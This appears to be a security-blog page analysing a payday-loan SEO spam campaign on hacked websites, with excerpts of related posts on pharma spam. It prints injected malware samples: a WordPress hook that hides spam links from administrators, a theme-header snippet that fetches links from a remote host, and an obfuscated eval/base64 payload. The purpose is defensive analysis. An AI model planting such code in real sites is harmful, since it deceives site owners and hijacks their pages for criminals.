Payday Loan Spam affecting Thousands of Sites

One of the most important metrics used by search engines to rank a site is the number of link backs that it has. The more links a site has for a specific keyword, the higher it will rank when someone searches for it. So if a site has a lot of links back for a keyword (say “loan”), if someone searches for “loan” it will rank very high.

That’s where SPAM SEO (Search Engine Optimization) comes int play. Instead of building content and growing a site to organically receive links back, criminals (yes, anyone that hacks someone’s else site for monetary gain is a criminal) will hack into websites and inject links that will target specific keywords.

Those links will then point to a website controlled by the attacker[s] that they want to have better ranking. Very often those links are conditional (only displayed for search engine bots) and hard to detect without a specialized scanning tool.

Payday Loan Spam

We see all types of SPAM, the most common used to be about pharma products (like Viagra  or Cialis), Cassinos online and pornographic pages. Lately, however, we have started to see a sharp increase in the number of sites injected with payday loan and money borrowing services.

The SPAM in it of itself once displayed is very simple, all it does is add a hidden link to a site to offer loans. Similar to:

<a href="httx://payday-all.co.uk/” title="Pay Day Loans Uk”>pay day loans uk</a>

When Google (or Bing) visits the compromised site it will see the link to payday-all.co.uk and increase the PR (page rank) for payday-all.co.uk. As more sites get infected and linking to payday-all, the better it will rank for keywords like “UK Pay day loan”.

Note that this type of spam is not new and we first blogged about it last year: Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla, explaining how they were being hidden inside WordPress sites.

Over the past year, this campaign continues to grow and evolve and their techniques have also matured.

Payday Loan Spam – The domains

Most of the payday spam we are tracking seems to end in one of the following domains (by a company called Cash Advance Online or Pay Day Online):

http://paydayloansyouknow.com.au/ (216.172.52.62)
http://paydayloanstores88paycheck.com/ (216.172.52.62)
http://quickcashnowgjyourself.com/ (216.172.52.64)
http://getin10minpaydayloans.com/ (216.172.52.64)
http://cheappaydayadvancevcadvanc.com (216.172.52.64)
http://cashadvancelocationsndbusiness.com (216.172.52.64)
http://findcashadvancefor.me/ (216.172.52.63)
http://findcashadvancenow4.me/ (216.172.52.64)
http://paydayloanlendersxocomprehensive.com/ (216.172.52.60)
http://personalcashloans64long.com/ (216.172.52.67)
http://loanstillpaydayncwith.com (216.172.52.67)
http://kopainstallmentpaydayloansonline.com (216.172.52.67)
http://ukropinstantloans.com (64.191.79.185)
http://pincashadvance.com (64.191.79.185)
http://perapaydayloansonline.com (64.191.79.185)
http://kopainstallmentpaydayloansonline.com/ (64.191.79.185)
http://loronlinepersonalloans.com/ (50.115.172.170)
http://inapersonalloans.com/ (50.115.172.24)
http://paydayloans10dokp.com/ (109.206.176.120)
http://paydayloans10tilp.com/ (173.214.248.102)
http://paydayloans10ukhw.com/ (173.214.248.100)
http://paydayloansthis.com/ (109.206.176.19)
http://www.payday-hawk.co.uk/ (184.173.197.237)
http://paydayloansfromnowon.com/ (109.206.176.11)
http://cash-loans247.co.uk/ (37.1.209.107)
http://payday-all.co.uk/ (37.1.209.107)

Here are some quick stats on the IPs above:

109.206.176.11	1
109.206.176.120	1
109.206.176.19	1
173.214.248.100	1
173.214.248.102	1
184.173.197.237	1
216.172.52.60	1
216.172.52.62	2
216.172.52.63	1
216.172.52.64	5
216.172.52.67	3
37.1.209.107	2
50.115.172.170	1
50.115.172.24	1
64.191.79.185	4

and

109.206.176	3
173.214.248	2
184.173.197	1
216.172.52	12
37.1.209	2
50.115.172	2
64.191.79	4

Their templates all look the same, they try to convince the user to sign up and register with them to be pre-approved for a loan. This is the common landing page for Cash Advance Online:

Cash spam

And this is the template for Pay Day Online:

Spam cache 2

As you can see, a good and clean designed page trying to convince the user to sign up. What’s scary is the number of sites linked to them. If you do some searches on Google for the specific keywords they use:

“payday loans massachusetts” OR
“payday loan bad credit” OR
“business cash advance loans” OR
“No Fax Payday Loan”

You will find hundreds of thousands of pages linking to them. All from unrelated sites ranging from personal blogs, government sites, forums and universities.

Applying for a loan

After seeing so many sites with this spam, I felt compelled to see if can get a loan. So, I decided to try a few of them to see what would happened.

First, I filled the form that asked for a lot of personal information (Name, Address, email, Social security number, Bank information, etc). All of them denied me and redirected me to altohost.com, which in turn redirected me again to lenditfinancial.com.

http://getin10minpaydayloans.com/apply ->
https://altohost.com/system/thank.you.page/click.php?id=2610 ->

https://www.lenditfinancial.com/newcode/step2.php?referid=T3

Altohost is part of t3leads.com (affiliate marketing/tracking), so it seems the attackers are building this network of spam sites to redirect users to legitimate payment companies that offer affiliate commission (lendit Financial). Always about the money.

Payday Loan Spam – The hiding spot

As we said before, most of the spam is conditional, so a normal user visiting the site won’t see them. Only search engines (like Google or Bing) will see the malicious links added there. In addition to being conditional, the spam is also hidden via javascript. So if you are using a browser with javascript enabled, the spam will not show up.

This is the javascript used to hide the spam (that is also flagged by sitecheck):

SPAM seo push

And the attackers to do not stop there. On a WordPress site, they add the following piece of code (or similar) to inject the spam:

function b_call($b) {
if (!function_exists(“is_user_logged_in”) || is_user_logged_in() || !($m = get_option(“_metaproperty”))) {
return $b;
}
list($m, $n) = unserialize(trim(strrev($m)));
$b = preg_replace(“~<body[^>]*>~”, ‘\\0′.”\n”. $n .”\n”, $b);
$b = str_ireplace(“</head>”, $m.”\n</head>”, $b);
return $b;
}
function b_start() {
ob_start(“b_call”);
}
function b_end() {
ob_end_flush();
}
add_action(“wp_head”, “b_start”);
add_action(“wp_footer”, “b_end”);

Which will hide the code from anyone that is logged in (administrators of the site) and only display to the others. The spam content is also hidden inside the _metaproperty option inside the wp_options table.

The code changes at each new cycle of the spam, but the idea is the same. Make it harder for the owner of the site to detect and at the same time display the spam links to search engine bots.

Who is behind

It is very hard to point a specific organization or person responsible for those spam injections. The whois from all the domains is hidden and they seem to use quite a range of IP addresses. From our tests, they are pointing to affiliate links to try to make commission money from legitimate companies. So the only real way to track them is going after the legitimate lending companies and track who they are paying the money to.

Large Scale Compromises Leading to Traffic Distribution System

For the last few weeks we’ve been tracking a large scale decentralized Traffic Distribution System (TDS). It’s using hundreds of compromised sites as their first entry point. Anyone that visits the compromised sites from a search engine gets redirected to another site controlled by the attackers (most of the time with pornographic or pharmaceutical content).

For each of those redirections, the bad guys make money via affiliate commissions. Symantec explains well how those traffic distrubution systems work here: Web-Based Malware Distribution Channels: A Look at Traffic Redistribution Systems.


Read More

Website Malware – SPAM Injections – HideMe – KickeMe

Every now and then you have to give thanks that attackers have a sense of humor.

For the past few weeks, maybe months, who keeps track of time anyway, we have been seeing this injection and it makes us giggle like school girls every time.

If you look a little harder you’ll usually find it’s accompanied by this JavaScript injection:



Read More

Joomla Pharma Hack – Web Malware Removal

In my last SEO poisoning post I wrote about some really nasty conditional malware. In this one, we’re going to revert our attention to the more common variation of the attack, and look at the Joomla CMS.

Joomla Pharma Hack

This variation will be the Pharma hack. As of late, it seems to be going on a rampage on a number of CMS applications and many of its characteristics are similar. The objective appears to be clear though, find its way into Google’s search engine result pages (SERP).

While we can only speculate, the idea is simple – The SERPs are a cached product and as long as they keep the injections benign of malware they increase their odds of bypassing detection until someone spots it and reports.

Read More

Wpstats. org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

Read More

Intelligent (Pharma) Spam Decoded

We are seeing a rise in the use of intelligent SPAM – a.k.a Pharma Hack – across a number of platforms. We recently found a nice injection that made us salivate, we figured you’d be just as interested

It is of no surprise to us that attackers are always looking for ways to trick us and more importantly our users. This gem of a find was no different.

SPAM = “Stupid, Pointless Annoying Message”.

SPAM, in the form of unsolicited e-mail messages, is a problem that we face every day.  Imagine sending a client a link to a newly released product, they get to the page, and BAM they’re greeted with advertisements for pharmaceutical products (Viagra / Cialis / Male Enhancers). What do you think the impact would be?
Read More

Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..


Read More

Mass Spam Infection From Wplinksforwork Dot Com (50k+ WordPress Sites Hacked)

Last year we spoke about the siteurlpath blackhat SEO attack that was infecting many WordPress sites with spam.

But, how many? We had no clue at the time. Today, we decided to check on Google and it seems that almost 50k (yes, fifty thousand sites) were compromised, at minimum…

How do we know this? Well, the attack consists of contacting the domain wplinksforwork.com to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days and all the sites compromised (if they have display errors enabled), have this message in their footer:

Warning: file_get_contents(http://wplinksforwork.com/56132.. 47509328/p.php?host=… failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in ..


Read More

Mass Compromise of Sites at gogvo.com – SEO Spam

A regular topic of discussion the past few months has been the basicpills link injection (a type of blackhat seo spam) on WordPress sites.

If you are not familiar with it, thousands of sites have been infected with basicpills which injects a ton of spammy pharma links all over compromised site (It infiltrates WordPress and attacks the wp-posts table).

So what’s that have to do with gogvo.com getting compromised? Well, in the past, the attackers would inject links directing to 247pharmaceutical.com or amoxilpharm.com, sometimes something else but similar. The seem to have changed tactics, now they are injecting links to an image directory, like:

Read More

Host4africa Mass Compromise

We are seeing a lot of sites hosted at host4africa.com compromised with Blackhat Spam SEO. Most of them are in the .co.za TLD (at 74.53.0.0/16 and 74.54.0.0/16) and have hidden links to generic drugs (common Pharma Spam).

When you on click on links added to the compromised sites you are redirected to a Pharma page, like this one:

The number of sites compromised is pretty large. Here are some we identified on one site:

Read More